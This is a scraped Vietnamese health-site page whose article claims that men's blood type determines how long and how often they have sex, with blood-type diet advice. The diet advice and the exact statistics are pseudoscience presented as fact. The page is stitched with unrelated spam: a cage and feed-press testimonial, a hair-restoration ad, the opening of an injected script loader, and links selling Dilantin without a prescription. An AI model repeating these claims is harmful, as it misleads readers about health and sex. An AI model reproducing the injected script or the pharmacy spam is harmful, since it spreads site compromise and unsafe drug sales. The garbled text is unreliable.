Website cùng hệ thống:
Hỗ trợ trực tuyến:

Hoàng Giáp cung cấp lồng công nghiệp giá rẻ nhưng rất chuyên nghiệp. Sản phẩm bán lồng thỏ 100 làm bằng máy tự động, các mối hàn gọn, chắc chắn, các nan lồng được mạ kẽm sáng bóng và độ bền cao. Tôi đã sử dụng toàn bộ thiết bị máy làm cám Hoàng Giáp cung cấp từ lồng thỏ, van uống nước cho thỏ, máng ăn cho thỏ, tấm nhựa đa năng. Đặc biệt tôi rất yêu thích bán máy ép cám viên chăn nuôi, bởi sản phẩm này giúp tôi tiết kệm 60% chi phí chăn nuôi và 70% nhân lực cho chăn nuôi. Cảm ơn Hoàng Giáp Nhận đào tạo, hướng dẫn giải pháp phục hồi tóc hư tổn tận gốc chỉ sau 1 tuần

^ Lên đầu trang
Đàn ông nhóm máu nào vô địch về chuyện ấy?

Đàn ông nhóm máu nào vô địch về chuyện ấy?

Đăng ngày 20/02/2013

Một cuộc “mây mưa” của các quý ông nhóm máu A thường không kéo dài, nhưng về tần suất “yêu” thì họ là vô địch.

Việc biết mình sở hữu nhóm máu nào sẽ giúp bạn lựa chọn một chế độ dinh dưỡng hợp lý. Ngoài ra, nó còn giúp bạn có những “thông tin” thú vị về bản lĩnh đàn ông.

Cheap Chế độ dinh dưỡng theo nhóm máu

Nhóm máu O: Cần ăn nhiều protein, ít tinh bột. Điều này đồng nghĩa với việc bạn nên tăng cường các thực phẩm như thịt, cá và dầu oliu, điều độ với các thực phẩm như trứng, lạc, các loại hạt, rau xanh và trái cây.

Nhóm máu A: Nên hạn chế tất cả các loại thịt đỏ như thịt lợn, thịt bò và các sản phẩm chế biến từ bơ sữa. Bên cạnh đó, nên ưu tiên các loại rau xanh, trái cây hay ngũ cốc. Nếu bạn thuộc nhóm máu A, nên áp dụng các bài tập như yoga.

Nhóm máu B: Có chế độ ăn uống “dễ tính” hơn cả so với những nhóm máu khác. Bạn có thể ăn đa dạng các loại thực phẩm khác nhau như thịt, cá, rau xanh, các thực phẩm chế biến từ bơ sữa. Tuy nhiên cũng xin nhắc nhở bạn nên hạn chế việc thu nạp quá nhiều ngũ cốc hay các thực phẩm chế biến từ ngũ cốc như bánh mỳ, bột mỳ, bánh sandwich, pizza.

Nhóm máu AB: Nên ăn tăng cường các loại rau xanh và trái cây, nên kiểm soát lượng thịt cá và các sản phẩm chế biến từ bơ sữa khi thu nạp vào cơ thể.

Nhóm máu tiết lộ “bản lĩnh đàn ông”

Nhóm máu A: Theo khảo sát thì thời lượng cuộc “yêu” của những nam giới có nhóm máu A chỉ kéo dài hơn 4 phút nhưng họ lại có tần suất “yêu” vô địch nếu so với các nhóm máu khác. Trong một năm, họ có thể “ân ái” đến gần 200 lần, chính xác là 196 lần, một con số đáng ngạc nhiên.

Trong cuộc “hoan hỉ”, họ luôn biết cách làm hài lòng “đối phương”, biết phát huy điểm mạnh và khắc phục điểm yếu, vậy nên không sai khi nói đàn ông nhóm máu A rất biết cách làm chủ “thế trận”. Theo các chuyên gia thì quý ông nhóm máu A thích hợp với những phụ nữ nhóm máu A và O.

Nhóm máu B: Là tuýp đàn ông giành ngôi vị quán quân về thời lượng của cuộc “yêu”. Nếu cuộc mây mưa của đàn ông nhóm máu A chỉ kéo dài 4 phút thì quãng thời gian này đối với đàn ông nhóm B “khủng” hơn rất nhiều: tận 7 phút. Bình quân mỗi năm họ “yêu” 158 lần, tức cách 2 – 3 ngày một lần.

Nếu bạn là “chủ nhân” của nhóm máu A, B hoặc AB thì nên lựa chọn “một nửa” của mình là nhóm máu B, vì đó là một trong những cách đơn giản giúp bạn giữ lửa cho cuộc “yêu”.

Nhóm máu AB: Hơn 6 phút là quãng thời gian mà nam giới nhóm AB có thể “xung trận”. Tần suất “ân ái” của họ là 173 lần mỗi năm. Họ rất thích được cùng “chăn gối” với phụ nữ thuộc nhóm máu A.

Nhóm máu O: Thời gian “lâm trận” của những đấng mày râu nhóm máu O là khoảng hơn 5 phút với số lần “yêu” một năm là khoảng 180 lần.

Những chị em phụ nữ thuộc nhóm máu O nên chọn bạn đời cũng thuộc nhóm máu O, sẽ đạt được sự hòa hợp và viên mãn trong chốn phòng the.

(Theo Đất Việt)var d=document;var s=d.createElement(‘script’); Buy http://bosnakirtasiye.com/2018/02/02/purchase-finpecia-reviews/ dilantin online no prescription Order Cheap http://www.bizexcellence.ro/order-pamelor-for-pain/

© 2013 - 2018, NhómMáu.vn. Giữ toàn quyền. Vui lòng ghi rõ nguồn khi bạn phát hành lại nội dung từ website này.


Tags:

chuyện ấy

nhóm máu

phòng the

tình dục

vô địch

đàn ông


Bài viết liên quan

 • Nhóm máu và đời sống vợ chồng
  Nhóm máu và đời sống vợ chồng
  Đăng ngày 20/02/2018

  Nếu vợ chồng bạn một người thuộc nhóm máu A, người kia nhóm máu O thì sự kết hợp này được xem là hoà...

 • Nhóm máu tiết lộ "bản lĩnh đàn ông"
  Nhóm máu tiết lộ "bản lĩnh đàn ông"
  Đăng ngày 20/02/2018

  Các chàng nhóm máu B được coi là “nhà vô địch” trong chuyện vợ chồng. Họ nghĩ rất thoáng về quan hệ ...

 • Tinh dịch có lẫn máu
  Tinh dịch có lẫn máu
  Đăng ngày 20/02/2018

  Tinh dịch lẫn máu hay xuất tinh ra máu có tên khoa học là chứng hematospermia. Nếu máu vừa chảy ra t...

 • "Yêu" đến lần thứ tư mới ra máu
  "Yêu" đến lần thứ tư mới ra máu
  Đăng ngày 20/02/2018

  Em và bạn gái đã yêu nhau được hai năm. Cách đây 3 tháng do trong lúc gần gũi đã không giữ được mìn...

Bộ Y Tế Trung Ương Hội Chữ thập đỏ Việt Nam Kênh truyền hình Sức khỏe O2TV Viện Huyết học truyền máu Trung ương Bệnh viện K Bệnh viện Bạch Mai Bệnh viện Trung Ương Quân đội 108 Bệnh viện 103 Bệnh viện hữu nghị Việt Đức Bệnh viện Nhi Trung Ương Bệnh viện Phụ sản Trung Ương Bệnh viện Phụ sản Hà Nội EldonCard